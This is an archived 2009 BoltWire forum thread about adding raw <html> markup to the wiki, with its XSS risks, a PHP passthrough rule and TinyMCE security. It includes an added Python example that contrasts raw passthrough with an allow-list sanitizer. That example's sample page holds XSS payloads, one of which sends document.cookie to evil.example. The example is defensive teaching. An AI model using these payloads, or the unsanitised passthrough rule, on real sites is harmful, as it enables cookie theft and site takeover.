[request] How about a <html></html> syntax?


Linly

Jan 28, 2009, 11:41:10 PM
to BoltWire
Hi Dan,

While using TiddlyWiki, I've found the wiki syntax <html></html> very
useful. The syntax allows users to put HTML code directly into wiki
pages and displays it as is.

Sometimes, when I want to embed some HTML code from Flickr or Google
Maps into a wiki page, it would be easy to just copy and paste like this:

<html>
<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps?f=q&amp;source=s_q&amp;hl=zh-TW&amp;geocode=&amp;q=washington&amp;sll=25.091075,121.559834&amp;sspn=0.304706,0.564423&amp;gl=tw&amp;g=Taipei&amp;ie=UTF8&amp;ll=38.900385,-77.019825&amp;spn=0.016367,0.035276&amp;t=k&amp;z=14&amp;brcurrent=3,0x346ef3065c07572f:0xe711f004bf9c5469&amp;output=embed&amp;s=AARTsJrSNCFJskwmMdDKr_R1Rr-nQOuxEA"></iframe>
<br /><small><a href="http://maps.google.com/maps?f=q&amp;source=embed&amp;hl=zh-TW&amp;geocode=&amp;q=washington&amp;sll=25.091075,121.559834&amp;sspn=0.304706,0.564423&amp;gl=tw&amp;g=Taipei&amp;ie=UTF8&amp;ll=38.900385,-77.019825&amp;spn=0.016367,0.035276&amp;t=k&amp;z=14&amp;brcurrent=3,0x346ef3065c07572f:0xe711f004bf9c5469" style="color:#0000FF;text-align:left">Bigger Map</a></small>
</html>

Cheers,
linly

The Editor

Jan 29, 2009, 8:17:40 AM
to bolt...@googlegroups.com
Linly, how do they manage security on something like this? If you can
insert any HTML code on any writable page you would have severe XSS
problems...

You can do something similar on BoltWire, just with a twist. First
copy your html code to a page like code.embed.flickr and then in your
wiki, anywhere, put <embed flickr> and it should work. I think this is
more secure because you can control who can edit, and even read all or
specific code.embed pages. Whereas I'm not sure how to make an html
markup like you suggest secure...

There are ways to do it, no doubt. Drupal had something similar, but it
involved setting different levels of edit permissions based on user
status. I don't think I want to go down that path, as it would involve
a major reorganization of how the whole system works in BoltWire. It
might be worth thinking about some more, but I have my reservations...

Cheers,
Dan

Linly

Jan 30, 2009, 12:31:18 AM
to BoltWire
> Linly, how do they manage security on something like this? If you can
> insert any HTML code on any writable page you would have severe XSS
> problems...

Yes, TiddlyWiki is a local-side wiki; it uses JavaScript to write data
into a file only on the PC file system, like "c:\" or "D:\". If a
TiddlyWiki file (yes, TiddlyWiki is a single-file wiki) has been put
onto a web server, it becomes a read-only file. No one can change it
via "http://". TiddlyWiki users always write their wiki offline and
upload it via FTP or some special PHP uploader.

> You can do something similar on BoltWire, just with a twist. First
> copy your html code to a page like code.embed.flickr and then in your
> wiki, anywhere, put <embed flickr> and it should work. I think this is
> more secure because you can control who can edit, and even read all or
> specific code.embed pages. Whereas I'm not sure how to make an html
> markup like you suggest secure...

Yes, this is more secure, but difficult as well... :)

> There's ways no doubt to do it. Drupal had something similar, but it
> involved setting different levels of edit permissions based on user
> status. I don't think I want to go down that path, as it would involve
> a major reorganization of how the whole system works in BoltWire. It
> might be worth thinking about some more, but I have my reservations...

No, I don't like the "reorganization" idea either. But how about putting
<html></html> in as a config item, so the site admin can choose to turn
the function on or off? Or limit it so it can only be used in certain
groups?

Cheers,
linly

Shawn and Adriela Hoffman

Jan 30, 2009, 4:11:45 PM
to bolt...@googlegroups.com
Having an optional <html></html> markup would be very helpful! I have wished for that so many times! I agree that it should be disabled by default and only enabled by an admin if they so desire. But I would really like that! I tried to make my own plugin a while back to do that, but it didn't really work (because of my lack of PHP programming knowledge).

There are many times that I want to take a Word document and put it on my website, but I don't want to have to go back through the whole document and reformat it with BoltWire markup, so I take the HTML, put it in an embed page, and then put that into my markup. It would be so much nicer to be able to just have an <html></html> markup option.

So that's my vote! :-) An HTML markup would be a great option. And again, it should be disabled by default and only enabled by admins who know the risks.
It would only be a security risk if there are multiple people who can edit a website, right? And even then it would only be a risk if one of those people wanted to do damage, right? I am using BoltWire as a CMS and I am the only one who can log onto the website.

~Shawn

The Editor

Jan 30, 2009, 5:55:13 PM
to bolt...@googlegroups.com
Just have a minute, but it seems we could do this easily enough in a
config file:

MarkUp('pre', 'html', '/&lt;html>(.*?)&lt;\/html>/se',
'BOLTescape(str_replace("&lt;", "<", "$1"))'); // <html>

We could make it more sophisticated, but this ought to work. Just
tried a simple test, and it looks ok. But you need to really be
careful if you have ANYTHING on a site that is editable--like a
comment box or a sandbox or whatever. You will open yourself up to
the most wild of attacks. I mean even a title action or a member
registration form. You have to be VERY careful where and how you
allow access. Put it on a site and I could possibly hack into your
site in 5 minutes.

Of course, you can already put most html tags in BoltWire and they are
recognized. What is the problem with just dumping text in directly
with the html already? The <nolines></nolines> tag is supposed to take
care of the line break problem, though I admit the whole line break
thing needs to be revisited at some point... Hopefully soon... We
could work on a better html solution at that time if we wanted... But
limited html is more secure than full html.

Let me know if this doesn't work for you...

Dan
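The two approaches contrasted in the message above, the one-line <html> passthrough rule and "limited html", side by side, as an added example in Python. This is not BoltWire code and not code from the thread; it only reproduces the effect of the MarkUp() rule (everything between <html> and </html> is emitted verbatim) and then shows what an allow-list sanitizer would do with the same page. (The posted rule also relies on the PCRE `e` modifier, which evaluates the replacement as PHP code and was removed in PHP 7.0; the example below does not depend on it.) The sample page, the allow-list of tags and attributes, and the iframe embed hosts (maps.google.com, www.flickr.com) are assumptions chosen for illustration; the parser is the standard-library html.parser.

```python
"""Added example (not BoltWire code): raw <html> passthrough vs. an allow-list sanitizer."""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page (not from the thread): the kind of Google Maps embed
# Linly wanted, plus the kind of payload a hostile editor of any writable page
# (comment box, sandbox, registration form) could add.
SAMPLE_PAGE = """Our office is here:
<html>
<iframe width="425" height="350" frameborder="0" src="http://maps.google.com/maps?q=washington&amp;output=embed"></iframe>
<br /><small><a href="http://maps.google.com/maps?q=washington">Bigger Map</a></small>
<img src="x" onerror="alert(document.cookie)">
<script>document.location='http://evil.example/?c='+document.cookie</script>
<a href="javascript:alert(1)">click</a>
<iframe src="http://evil.example/login.html"></iframe>
</html>
Thanks!
"""

HTML_BLOCK = re.compile(r"<html>(.*?)</html>", re.S | re.I)


def raw_passthrough(page):
    """What the one-line MarkUp() rule amounts to: the body of every
    <html>...</html> block is emitted verbatim, so scripts, event handlers
    and javascript: links survive."""
    return HTML_BLOCK.sub(lambda m: m.group(1), page)


# Assumed "limited html" policy: tag -> attributes allowed on it.
ALLOWED_TAGS = {
    "a": {"href", "title"},
    "iframe": {"src", "width", "height", "frameborder", "scrolling"},
    "img": {"src", "alt", "width", "height"},
    "p": set(), "br": set(), "small": set(), "b": set(), "i": set(),
    "em": set(), "strong": set(), "ul": set(), "ol": set(), "li": set(),
}
VOID_TAGS = {"br", "img"}
URL_SCHEMES = {"http", "https"}
IFRAME_HOSTS = {"maps.google.com", "www.flickr.com"}  # assumed embed sources


def url_ok(value, tag):
    """Reject javascript:/data:/relative URLs and, for iframes, any host that
    is not an approved embed source."""
    parts = urlsplit(value.strip())
    if parts.scheme.lower() not in URL_SCHEMES:
        return False
    if tag == "iframe" and parts.hostname not in IFRAME_HOSTS:
        return False
    return True


class AllowListSanitizer(HTMLParser):
    """Re-serialises only allow-listed tags and attributes. Unknown tags are
    dropped (their text is kept), <script>/<style> are dropped with their
    contents, and all text is re-escaped so it can never become markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0  # depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return
        kept = [tag]
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue  # drops onerror=, style=, etc.
            if name in ("src", "href") and not url_ok(value, tag):
                continue
            kept.append('%s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (" ".join(kept), " /" if tag in VOID_TAGS else ""))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments are dropped


def sanitize_html(fragment):
    parser = AllowListSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def limited_html(page):
    """Same <html> markup, but the body goes through the allow-list instead
    of being emitted as-is."""
    return HTML_BLOCK.sub(lambda m: sanitize_html(m.group(1)), page)


if __name__ == "__main__":
    print("--- raw passthrough ---")
    print(raw_passthrough(SAMPLE_PAGE))
    print("--- limited html ---")
    print(limited_html(SAMPLE_PAGE))
```

Run it and compare the two outputs: the map iframe and the "Bigger Map" link survive both, but only the raw version carries the onerror handler, the script block, the javascript: link and the iframe pointing at a foreign host. The allow-list is deliberately tiny; in practice the per-group config file approach described later in the thread and a list like this one are complementary, since the list limits what an editor who is allowed to use <html> can do.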

Linly

Jan 31, 2009, 10:07:15 AM
to BoltWire
> Just have a minute, but it seems we could do this easily enough in a
> config file:
>
> MarkUp('pre', 'html', '/&lt;html>(.*?)&lt;\/html>/se',
> 'BOLTescape(str_replace("&lt;", "<", "$1"))');  // <html>

Great Dan, I put this line in a group-specific config file,
"config.photo.php", and it worked. Only the pages in the photo group can
use this <html> markup; other groups treat <html> as text, not markup.
Great.

> ...  We
> could work on a better html solution at that time if we wanted... But
> limited html is more secure than full html.

I like the "limited html" idea; this way it may be easy to integrate
an HTML editor, like TinyMCE, into BoltWire. A WYSIWYG editor is really
useful for wiki newbies.

Cheers,
linly

The Editor

Feb 1, 2009, 3:09:12 PM
to bolt...@googlegroups.com
> I like the "limited html" idea; this way it may be easy to integrate
> an HTML editor, like TinyMCE, into BoltWire. A WYSIWYG editor is really
> useful for wiki newbies.

I like the idea of TinyMCE and I think it is something we could
probably manage. I've been looking at it the last few minutes. However
there are some serious security issues that would have to be resolved.
And to resolve them we would have to do some major backend coding to
handle the TinyMCE form submission. Here is a short but pointed post
on the subject.

http://wiki.moxiecode.com/index.php/TinyMCE_Talk:Security

BoltWire has a special session-based authentication system for its
form submissions, and it can't simply be dropped into TinyMCE. In
fact, I'm not sure exactly how to do it; I would probably have to
reproduce the whole BoltWire security system in some kind of plugin.
But hey, anything is possible, and it would make a really nice
addition to BoltWire. Let's add it to the todo list and if I get
inspired one day I'll take a crack at it.

Cheers,
Dan
